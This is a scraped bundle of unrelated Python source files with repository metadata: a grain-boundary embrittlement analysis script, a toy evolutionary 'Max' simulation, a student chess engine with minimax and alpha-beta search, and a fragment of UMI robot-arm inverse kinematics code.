return (DE_seg_i_GB, N_hat_i_GB, num_site_types, site_type_ind)
# %% MAIN
# Read in data frames
df_Pop = pd.read_csv("../Results/Pop.csv",index_col = 0).astype(float)
# From data frame to arrays
delta_E_seg_GB_i = np.array(df_Pop['delta_E_seg_GB_i'])
Pi = np.array(df_Pop['Pi'])
# Round by this number when comparing energies
NDIGITS = 3
# Perform simulations for all given models
allSims = listdir('../GBs/')
# %% Create a data frame to store all results
# Define columns (three properties shown in Fig. 5)
columns_all = ["DE_hat_b","PR_hat_GB","E_hat_b"]
# Tilt and GB normals as indices of the data frame
tilt_axes = [sim.split('_')[0] for sim in allSims]
GB_normals = [sim.split('_')[1] for sim in allSims]
# Levels required for a multi index data frame
levels_all = list(zip(*[tilt_axes, GB_normals]))
# Define indices
index_all = pd.MultiIndex.from_tuples(levels_all, names=['Tilt', 'Normal'])
# Initialize the data frame
df_all = pd.DataFrame(index = index_all, columns=columns_all)
#%% For each sample
for indSim,sim in enumerate(allSims):
# Obtain GB normal and tilt axes from the folder names
GB_normal = str(sim.split('_')[1])
GB_tilt = str(sim.split('_')[0])
# Model path
model_path = path.join("../GBs/", str(sim) + "/")
# Read in number of GB atoms considered in the simulation
N_hat_GB = getNumOfAtoms(path.join(model_path, "Results/"),"GBEnergies.dat")
# Initialize an array for energies of individual sites in GB models
GBenergies = np.zeros((N_hat_GB,5))
# Initialize an array for energies of individual sites in FS models
FSenergies = np.zeros((N_hat_GB,5))
try:
# Read energies for each sample
getEnergies(path.join(model_path, "Results/"),"GBEnergies.dat",GBenergies)
getEnergies(path.join(model_path, "Results/"),"FSEnergies.dat",FSenergies)
# Sort by atom ID
GBenergies = GBenergies[np.argsort(GBenergies[:,0]),:]
FSenergies = FSenergies[np.argsort(FSenergies[:,0]),:]
# Weed out non-matching simulations (if one of two simulations per atom ID is failed)
# Find out the intersection vector of two arrays, then delete rows with different atom IDs
for ind,val in enumerate(np.asarray(np.intersect1d(GBenergies[:,0],FSenergies[:,0]),dtype=int)):
if (not np.searchsorted(GBenergies[:,0],val) == ind):
GBenergies = np.delete(GBenergies,ind,0)
if (not np.searchsorted(FSenergies[:,0],val) == ind):
FSenergies = np.delete(FSenergies,ind,0)
# Update number of atoms
N_hat_GB = np.size(GBenergies,axis=0)
# Find unique segregation energies and their number of occurences using segEngOcc function
DE_seg_i_GB, N_hat_i_GB, num_site_types_GB, site_type_ind_GB = segEngOcc(GBenergies,4,NDIGITS)
# Site type indices should be preserved after cleavage (See Section 4)
DE_seg_i_FS = FSenergies[site_type_ind_GB,4]
# Embrittling potencies
DE_b_i = GBenergies[site_type_ind_GB,4]-FSenergies[site_type_ind_GB,4]
# Site occupancies
P_bar_i_GB = np.zeros(num_site_types_GB)
# Obtain P_bar_i_GB from the population (closest value)
for i in range(num_site_types_GB): P_bar_i_GB[i] = Pi[(np.abs(delta_E_seg_GB_i - DE_seg_i_GB[i])).argmin()]
# Rescaled site occupancy for each site type i
PR_hat_i_GB = P_bar_i_GB/np.sum(np.multiply(P_bar_i_GB, N_hat_i_GB))
# Site specific embrittling estimator
E_hat_b_i = np.multiply(PR_hat_i_GB,DE_b_i)
# Sample embrittling estimator
E_hat_b = np.sum(np.multiply(np.multiply(PR_hat_i_GB,N_hat_i_GB),DE_b_i))/(N_hat_GB)
# Write properties to the all results data frame
df_all['DE_hat_b'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(DE_b_i,N_hat_i_GB)))/N_hat_GB
df_all['PR_hat_GB'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(PR_hat_i_GB,N_hat_i_GB)))/N_hat_GB
df_all['E_hat_b'][GB_tilt,GB_normal] = E_hat_b
except:
print(indSim+1,sim,"Properties not calculated!")
continue
# %% To csv
df_all.to_csv("../Results/AllResults.csv") | Python | 197 | 38.568527 | 131 | /Scripts/Samples.py | 0.60801 | 0.602503 |
codingconnor112/Max | refs/heads/main | import copy
import pickle
import random
import sys
print(" Max testing intellegence")
print("a simple AI simulation")
print("made with python version "+sys.version)
file = open(r"test.info", mode = "rb")
try:
testdict = pickle.load(file)
except EOFError:
pass
file.close()
global agentnum
agentnum = int(input("agents for MAX"))
class Agent(object):
def __init__(self, lineval):
self.lineval = lineval
self.score = 0
def test(self, testsheet):
answer = []
for x in testsheet:
if round(x) >= self.lineval:
answer.append(True)
else:
answer.append(False)
return answer
def reproduce(self, other):
us=other
usnums = []
for x in us:
usnums.append(x.score)
if usnums.index(max(usnums)) == us.index(self):
agentsnew = []
for x in range(0, agentnum-1):
agentsnew.append(copy.copy(self))
agentsnew[len(agentsnew-1)].lineval += random.randint(-1, 1)
agentsnew.append(self)
return agentsnew
else:
try:
return []
finally:
del self
iternum = int(input("iteration count"))
testque = list(testdict.keys())
testans = list(testdict.values())
agents=[Agent(random.randint(0, 100)), Agent(random.randint(0, 100)), Agent(random.randint(0, 100))]
for z in agents:
print(z.lineval)
for x in range(0, iternum):
for i in agents:
right = 0
testresults = i.test(testque)
for j in testresults:
if j == testans[testresults.index(j)]:
right += 1
i.score = right
for y in agents:
r = i.reproduce(agents)
if len(r) != 0:
print("iteration "+str(x+1)+" sucessful")
agents = r
for nz in agents:
print(nz.lineval)
print("done")
while True:
hinputnum = int(input("number"))
if random.choice(agents).lineval >= hinputnum:
print("small number")
else:
print("big number")
| Python | 73 | 27.589041 | 100 | /MAX.py | 0.563967 | 0.552947 |
codingconnor112/Max | refs/heads/main | import pickle, random
t = open("test.info", "wb")
t.truncate(0)
dic = {}
for x in range(0, 10):
randomnum = random.randint(0, 100)
print(randomnum)
dic[randomnum] = bool(input("1/0 big "))
pickle.dump(dic, t)
t.close()
| Python | 10 | 21.5 | 42 | /rantest.py | 0.648889 | 0.604444 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | from __future__ import print_function
from copy import deepcopy
import sys
## Helper functions
# Translate a position in chess notation to x,y-coordinates
# Example: c3 corresponds to (2,5)
def to_coordinate(notation):
x = ord(notation[0]) - ord('a')
y = 8 - int(notation[1])
return (x, y)
# Translate a position in x,y-coordinates to chess notation
# Example: (2,5) corresponds to c3
def to_notation(coordinates):
(x, y) = coordinates
letter = chr(ord('a') + x)
number = 8 - y
return letter + str(number)
# Translates two x,y-coordinates into a chess move notation
# Example: (1,4) and (2,3) will become b4c5
def to_move(from_coord, to_coord):
return to_notation(from_coord) + to_notation(to_coord)
## Defining board states
# These Static classes are used as enums for:
# - Material.Rook
# - Material.King
# - Material.Pawn
# - Side.White
# - Side.Black
class Material:
Rook, King, Pawn, Queen, Horse = ['r', 'k', 'p', 'q', 'h']
class Side:
White, Black = range(0, 2)
# A chesspiece on the board is specified by the side it belongs to and the type
# of the chesspiece
class Piece:
def __init__(self, side, material):
self.side = side
self.material = material
# A chess configuration is specified by whose turn it is and a 2d array
# with all the pieces on the board
class ChessBoard:
def __init__(self, turn):
# This variable is either equal to Side.White or Side.Black
self.turn = turn
self.board_matrix = None
## Getter and setter methods
def set_board_matrix(self, board_matrix):
self.board_matrix = board_matrix
# Note: assumes the position is valid
def get_boardpiece(self, position):
(x, y) = position
return self.board_matrix[y][x]
# Note: assumes the position is valid
def set_boardpiece(self, position, piece):
(x, y) = position
self.board_matrix[y][x] = piece
# Read in the board_matrix using an input string
def load_from_input(self, input_str):
self.board_matrix = [[None for _ in range(8)] for _ in range(8)]
x = 0
y = 0
for char in input_str:
if y == 8:
if char == 'W':
self.turn = Side.White
elif char == 'B':
self.turn = Side.Black
return
if char == '\r':
continue
if char == '.':
x += 1
continue
if char == '\n':
x = 0
y += 1
continue
if char.isupper():
side = Side.White
else:
side = Side.Black
material = char.lower()
piece = Piece(side, material)
self.set_boardpiece((x, y), piece)
x += 1
# Print the current board state
def __str__(self):
return_str = ""
return_str += " abcdefgh\n\n"
y = 8
for board_row in self.board_matrix:
return_str += str(y) + " "
for piece in board_row:
if piece == None:
return_str += "."
else:
char = piece.material
if piece.side == Side.White:
char = char.upper()
return_str += char
return_str += '\n'
y -= 1
turn_name = ("White" if self.turn == Side.White else "Black")
return_str += "It is " + turn_name + "'s turn\n"
return return_str
# Given a move string in chess notation, return a new ChessBoard object
# with the new board situation
# Note: this method assumes the move suggested is a valid, legal move
def make_move(self, move_str):
start_pos = to_coordinate(move_str[0:2])
end_pos = to_coordinate(move_str[2:4])
if self.turn == Side.White:
turn = Side.Black
else:
turn = Side.White
# Duplicate the current board_matrix
new_matrix = [row[:] for row in self.board_matrix]
# Create a new chessboard object
new_board = ChessBoard(turn)
new_board.set_board_matrix(new_matrix)
# Carry out the move in the new chessboard object
piece = new_board.get_boardpiece(start_pos)
new_board.set_boardpiece(end_pos, piece)
new_board.set_boardpiece(start_pos, None)
return new_board
def is_king_dead(self, side):
seen_king = False
for x in range(8):
for y in range(8):
piece = self.get_boardpiece((x, y))
if piece != None and piece.side == side and \
piece.material == Material.King:
seen_king = True
return not seen_king
# This function should return, given the current board configuation and
# which players turn it is, all the moves possible for that player
# It should return these moves as a list of move strings, e.g.
# [c2c3, d4e5, f4f8]
# TODO: write an implementation for this function
def legal_moves(self):
lower_bound = 0
upper_bound = 8
turn = self.turn
total_moves = []
for y in range(lower_bound, upper_bound):
for x in range(lower_bound, upper_bound):
location = (x, y)
piece = self.get_boardpiece(location)
if piece == None:
continue
else:
if piece.side == turn:
material = piece.material
if material == Material.Pawn:
move = self.pawn_move(turn, location)
if move != []:
total_moves.extend(move)
if material == Material.Rook:
moves = self.rook_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.King:
moves = self.king_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.Queen:
moves = self.queen_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.Horse:
moves = self.horse_move(turn, location)
if move != []:
total_moves.extend(moves)
total_moves = self.translate_coordinates(total_moves)
# print(total_moves)
return total_moves
def horse_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if y > 1:
y1 = y - 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y < 6:
y1 = y + 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x > 1:
x1 = x - 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x < 6:
x1 = x + 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
return moves
def queen_move(self, turn, location_1):
moves = []
location_2 = list(location_1)
rook_moves = self.rook_move(turn, location_1)
moves.extend(rook_moves)
while location_2[0] != 7 and location_2[1] != 0:
location_2[0] += 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 7 and location_2[1] != 7:
location_2[0] += 1
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 7:
location_2[0] -= 1
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 0:
location_2[0] -= 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
return moves
def pawn_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if turn == Side.White:
if y != 0:
y1 = y - 1
location_2 = (x, y1)
piece = self.get_boardpiece(location_2)
if piece == None:
move = [location_1, location_2]
moves.append(move)
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
if x != 7:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
else:
if y != 7:
y1 = y + 1
location_2 = (x, y1)
if self.check_occupied_by_self(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
if x != 7:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
return moves
def check_occupied_by_self(self, location):
turn = self.turn
piece = self.get_boardpiece(location)
if piece != None:
if piece.side == turn:
return 1
return 0
def check_occupied_by_other(self, location):
turn = self.turn
piece = self.get_boardpiece(location)
if piece != None:
if piece.side != turn:
return 1
return 0
def rook_move(self, turn, location_1):
location_2 = list(location_1)
moves = []
while location_2[0] != 7:
location_2[0] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0:
location_2[0] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[1] != 7:
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[1] != 0:
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
return moves
def king_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if y != 0:
lower_y = y - 1
location_2 = (x, lower_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 0:
lower_x = x - 1
location_2 = (lower_x, lower_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 7:
upper_x = x + 1
location_2 = (upper_x, lower_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 0:
lower_x = x - 1
location_2 = (lower_x, y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if y != 7:
upper_y = y + 1
location_2 = (lower_x, upper_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 7:
upper_x = x + 1
location_2 = (upper_x, y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if y != 7:
upper_y = y + 1
location_2 = (upper_x, upper_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if y != 7:
upper_y = y + 1
location_2 = (x, upper_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
return moves
def translate_coordinates(self, total_moves):
total_moves_notation = []
for move in total_moves:
notation_move = ""
for coordinate in move:
notation_move += to_notation(coordinate)
total_moves_notation.append(notation_move)
return total_moves_notation
# This function should return, given the move specified (in the format
# 'd2d3') whether this move is legal
# TODO: write an implementation for this function, implement it in terms
# of legal_moves()
def is_legal_move(self, move):
if move in self.legal_moves():
return True
else:
return False
def score_total_pieces(chessboard):
score = 0
lower_bound = 0
upper_bound = 8
for y in range(lower_bound, upper_bound):
for x in range(lower_bound, upper_bound):
location = (x, y)
piece = chessboard.get_boardpiece(location)
if piece != None:
material = piece.material
side = piece.side
if material == Material.Pawn:
if side == Side.White:
score += 1
else:
score -= 1
if (material == Material.Rook) or (material == Material.Horse):
if side == Side.White:
score += 5
else:
score -= 5
if material == Material.King:
if side == Side.White:
score += 100
else:
score -= 100
if material == Material.Queen:
if side == Side.White:
score += 50
else:
score -= 50
return score
# This static class is responsible for providing functions that can calculate
# the optimal move using minimax
class ChessComputer:
# This method uses either alphabeta or minimax to calculate the best move
# possible. The input needed is a chessboard configuration and the max
# depth of the search algorithm. It returns a tuple of (score, chessboard)
# with score the maximum score attainable and chessboardmove that is needed
# to achieve this score.
@staticmethod
def computer_move(chessboard, depth, alphabeta=False):
if alphabeta:
inf = 99999999
min_inf = -inf
return ChessComputer.alphabeta(chessboard, depth, min_inf, inf)
else:
return ChessComputer.minimax(chessboard, depth)
# This function uses minimax to calculate the next move. Given the current
# chessboard and max depth, this function should return a tuple of the
# the score and the move that should be executed
# NOTE: use ChessComputer.evaluate_board() to calculate the score
# of a specific board configuration after the max depth is reached
# TODO: write an implementation for this function
@staticmethod
def minimax(chessboard, depth):
inf = 99999999
min_inf = -inf
turn = chessboard.turn
if depth == 0 or chessboard.is_king_dead(Side.Black) or chessboard.is_king_dead(Side.White):
return (ChessComputer.evaluate_board(chessboard, depth), "there is no move anymore")
# Maximizer white
if turn == Side.White:
bestValue = min_inf
bestMove = None
for move in chessboard.legal_moves():
new_board = chessboard.make_move(move)
value, move1 = ChessComputer.minimax(new_board, depth - 1)
if value > bestValue:
bestValue = value
bestMove = move
return (bestValue, bestMove)
# Minimizer black
else:
bestValue = inf
bestMove = None
for move in chessboard.legal_moves():
new_board = chessboard.make_move(move)
value, move1 = ChessComputer.minimax(new_board, depth - 1)
if value < bestValue:
bestValue = value
bestMove = move
return (bestValue, bestMove)
# This function uses alphabeta to calculate the next move. Given the
# chessboard and max depth, this function should return a tuple of the
# the score and the move that should be executed.
# It has alpha and beta as extra pruning parameters
# NOTE: use ChessComputer.evaluate_board() to calculate the score
# of a specific board configuration after the max depth is reached
@staticmethod
def alphabeta(chessboard, depth, alpha, beta):
turn = chessboard.turn
if depth == 0 or chessboard.is_king_dead(Side.Black) or chessboard.is_king_dead(Side.White):
return (ChessComputer.evaluate_board(chessboard, depth), "there is no move anymore")
# Maximizer white
if turn == Side.White:
bestValue = alpha
bestMove = None
for move in chessboard.legal_moves():
new_board = chessboard.make_move(move)
value, move1 = ChessComputer.alphabeta(new_board, depth - 1, alpha, beta)
if value > bestValue:
bestValue = value
bestMove = move
if value > alpha:
alpha = value
if beta <= alpha:
break
return (bestValue, bestMove)
# Minimizer black
else:
bestValue = beta
bestMove = None
for move in chessboard.legal_moves():
new_board = chessboard.make_move(move)
value, move1 = ChessComputer.alphabeta(new_board, depth - 1, alpha, beta)
if value < bestValue:
bestValue = value
bestMove = move
if value < beta:
beta = value
if beta <= alpha:
break
return (bestValue, bestMove)
# Calculates the score of a given board configuration based on the
# material left on the board. Returns a score number, in which positive
# means white is better off, while negative means black is better of
@staticmethod
def evaluate_board(chessboard, depth_left):
total_score = 0
total_score += ChessBoard.score_total_pieces(chessboard)
#print("total_score without depth", total_score)
if depth_left > 0:
total_score = total_score*(depth_left*10)
return total_score
# This class is responsible for starting the chess game, playing and user
# feedback
class ChessGame:
def __init__(self, turn):
# NOTE: you can make this depth higher once you have implemented
# alpha-beta, which is more efficient
self.depth = 5
self.chessboard = ChessBoard(turn)
# If a file was specified as commandline argument, use that filename
if len(sys.argv) > 1:
filename = sys.argv[1]
else:
filename = "board_configurations/mate_in_two1.chb"
# filename = "board_test1.chb"
print("Reading from " + filename + "...")
self.load_from_file(filename)
def load_from_file(self, filename):
with open(filename) as f:
content = f.read()
self.chessboard.load_from_input(content)
def main(self):
while True:
print(self.chessboard)
# Print the current score
score = ChessComputer.evaluate_board(self.chessboard, self.depth)
print("Current score: " + str(score))
# Calculate the best possible move
new_score, best_move = self.make_computer_move()
print("Best move: " + best_move)
print("Score to achieve: " + str(new_score))
print("")
print("new board is:")
print(self.chessboard.make_move(best_move))
self.make_human_move()
def make_computer_move(self):
print("Calculating best move...")
return ChessComputer.computer_move(self.chessboard,
self.depth, alphabeta=True)
def make_human_move(self):
# Endlessly request input until the right input is specified
while True:
if sys.version_info[:2] <= (2, 7):
move = raw_input("Indicate your move (or q to stop): ")
else:
move = input("Indicate your move (or q to stop): ")
if move == "q":
print("Exiting program...")
sys.exit(0)
elif self.chessboard.is_legal_move(move):
break
print("Incorrect move!")
self.chessboard = self.chessboard.make_move(move)
# Exit the game if one of the kings is dead
if self.chessboard.is_king_dead(Side.Black):
print(self.chessboard)
print("White wins!")
sys.exit(0)
elif self.chessboard.is_king_dead(Side.White):
print(self.chessboard)
print("Black wins!")
sys.exit(0)
chess_game = ChessGame(Side.Black)
chess_game.main() | Python | 718 | 35.536213 | 100 | /chessgame_herstel.py | 0.498285 | 0.480482 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | Rook, King, Pawn, Queen, Horse = ['r', 'k', 'p', 'q', 'h']
if material == Material.Queen:
moves = self.queen_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.Horse:
moves = self.horse_move(turn, location)
if move != []:
total_moves.extend(moves)
def horse_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if y > 1:
y1 = y - 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y < 6:
y1 = y + 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x > 1:
x1 = x - 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x < 6:
x1 = x + 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
return moves
def queen_move(self, turn, location_1):
moves = []
location_2 = list(location_1)
rook_moves = self.rook_move(turn,location_1)
moves.extend(rook_moves)
while location_2[0] != 7 and location_2[1] != 0:
location_2[0] += 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 7 and location_2[1] != 7:
location_2[0] += 1
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 7:
location_2[0] -= 1
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 0:
location_2[0] -= 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
return moves
if material == Material.Queen:
if side == Side.White:
score += 50
else:
score -= 50 | Python | 125 | 35.119999 | 68 | /test.py | 0.442623 | 0.402082 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | #!python2
from __future__ import division, print_function
from umi_parameters import UMI_parameters
from umi_common import *
import math
import numpy as np
from visual import *
# Specifications of UMI
# Enter the correct details in the corresponding file (umi_parameters.py).
# <<<<<<<<<<-------------------------------------------------------------------- TODO FOR STUDENTS
UMI = UMI_parameters()
################################
# ZSB - Opdracht 2 #
# umi_student_functions.py #
# 16/06/2017 #
# #
# Anna Stalknecht - 10792872 #
# Claartje Barkhof - 11035129 #
# Group C #
# #
################################
'''
This file contains functions for the support of the UMI robot.
We implemented 3 functions: apply_inverse_kinematics, board_position_to_cartesian,
high_path and move_to_garbage. We implemented them making use of de slides of Leo Dorst on Robotics.
'''
def apply_inverse_kinematics(x, y, z, gripper):
''' Computes the angles of the joints, given some real world coordinates
making use of inverse kinematics based on the Robotics readers made by
Leo Dorst.
:param float x: cartesian x-coordinate
:param float y: cartesian y-coordinate
:param float z: cartesian z-coordinate
:return: Returns the a tuple containing the position and angles of the robot-arm joints.
'''
# Riser_position
riser_position = y + UMI.total_arm_height
# Variables:
x_ik = x # x in inverse kinematics (x_ik)
x_ik_2 = (x**2) # square of x_ik
y_ik = z # z in inverse kinematics
y_ik_2 = (z**2) # square of z_ik
l_1 = UMI.upper_length
l_2 = UMI.lower_length
l_1_2 = (UMI.upper_length**2)
l_2_2 = (UMI.lower_length**2)
# IK formulas
elbow_angle = math.acos((x_ik_2 + y_ik_2 - l_1_2 - l_2_2)/(2*l_1*l_2))
s_2 = (math.sqrt(1-(math.cos(elbow_angle)**2)))
shoulder_angle = math.atan2(y_ik,x_ik) - atan2((l_2*s_2),(l_1+(l_2*math.cos(elbow_angle))))
# Resulting angles in degrees
elbow_angle = degrees(elbow_angle)
shoulder_angle = degrees(shoulder_angle)
# Resulting wrist angle (counter-turning the two other joints)
wrist_angle = (-elbow_angle-shoulder_angle)
return (riser_position, shoulder_angle, elbow_angle, wrist_angle, gripper)
def board_position_to_cartesian(chessboard, position):
''' Convert a position between [a1-h8] to its cartesian coordinates in frameworld coordinates.
You are not allowed to use the functions such as: frame_to_world.
You have to show actual calculations using positions/vectors and angles.
:param obj chessboard: The instantiation of the chessboard that you wish to use.
:param str position: A position in the range [a1-h8]
:return: tuple Return a position in the format (x,y,z)
def rotate(origin, point, angle):
'''
# Special garbage location
if(position == 'j5'):
row = -2
column = 3
# Normal locations (center of fields on the board)
else:
half_pi = (math.pi/2)
letter = position[0]
number = int(position[1])
angle = -(chessboard.get_angle_radians())
# Get the local coordinates for the tiles on the board in the 0-7 range.
letter_list = ['h', 'g', 'f', 'e', 'd', 'c', 'b', 'a']
number_list = [8,7,6,5,4,3,2,1]
field_size = chessboard.field_size #meters
(ox, oy, oz) = chessboard.get_position() # origin of rotation
# Abstract column and row from the notation-form position
column = letter_list.index(letter)
row = number_list.index(number)
# Calculate dz and dx measured from H8, the origin of rotation
dz = (column+0.5) * field_size
dx = (row+0.5) * field_size
# Calculate dz and dx measured from H8, the origin of rotation
pz = oz + dz
px = ox + dx
# The actual rotating point
world_coordinate_z = oz + math.cos(angle) * (pz - oz) - math.sin(angle) * (px - ox)
world_coordinate_x = ox + math.sin(angle) * (pz - oz) + math.cos(angle) * (px - ox)
# y is not affected by the rotation
world_coordinate_y = chessboard.get_board_height()
# Output the results.
result = (world_coordinate_x, world_coordinate_y, world_coordinate_z)
return result
def high_path(chessboard, from_pos, to_pos):
'''
Computes the high path that the arm can take to move a piece from one place on the board to another.
:param chessboard: Chessboard object
:param from_pos: [a1-h8]
:param to_pos: [a1-h8]
:return: Returns a list of instructions for the GUI.
'''
sequence_list = []
# We assume that 20 centimeter above the board is safe.
safe_height = 0.2
# We assume that 10 centimeter above the board is "low".
low_height = 0.1
# Get the coordinates.
(from_x,from_y,from_z) = board_position_to_cartesian(chessboard, from_pos)
(to_x,to_y,to_z) = board_position_to_cartesian(chessboard, to_pos)
# Define half_piece_height according to which piece you are encountering (material)
[nonsense, material, colour] = chessboard.pieces[from_pos]
half_piece_height = (chessboard.pieces_height[material]/2)+chessboard.get_board_height()
# Hover above the first field on SAFE height:
sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, chessboard.field_size))
# Hover above the first field on LOW height:
sequence_list.append(apply_inverse_kinematics(from_x, low_height, from_z, chessboard.field_size))
# Hover above the first field on half of the piece height:
sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, chessboard.field_size))
# Grip the piece
sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, 0))
# Give instruction to GUI to pickup piece
sequence_list.append(["GUI", "TAKE", from_pos])
# Hover above the first field on SAFE height, keeping the gripper closed
sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, 0))
# Move to new position on SAFE height
sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, 0))
# Hover above the second field on LOW height:
sequence_list.append(apply_inverse_kinematics(to_x, low_height, to_z, 0))
# Hover above the second field on half of the piece height:
sequence_list.append(apply_inverse_kinematics(to_x, half_piece_height, to_z, chessboard.field_size))
# Give instruction to GUI to drop piece
sequence_list.append(["GUI", "DROP", to_pos])
# Move to new position on SAFE height (And open the gripper)
sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, chessboard.field_size))
return sequence_list
def move_to_garbage(chessboard, from_pos):
'''
Computes the high path that the arm can take to move a piece from one place on the board to the garbage location.
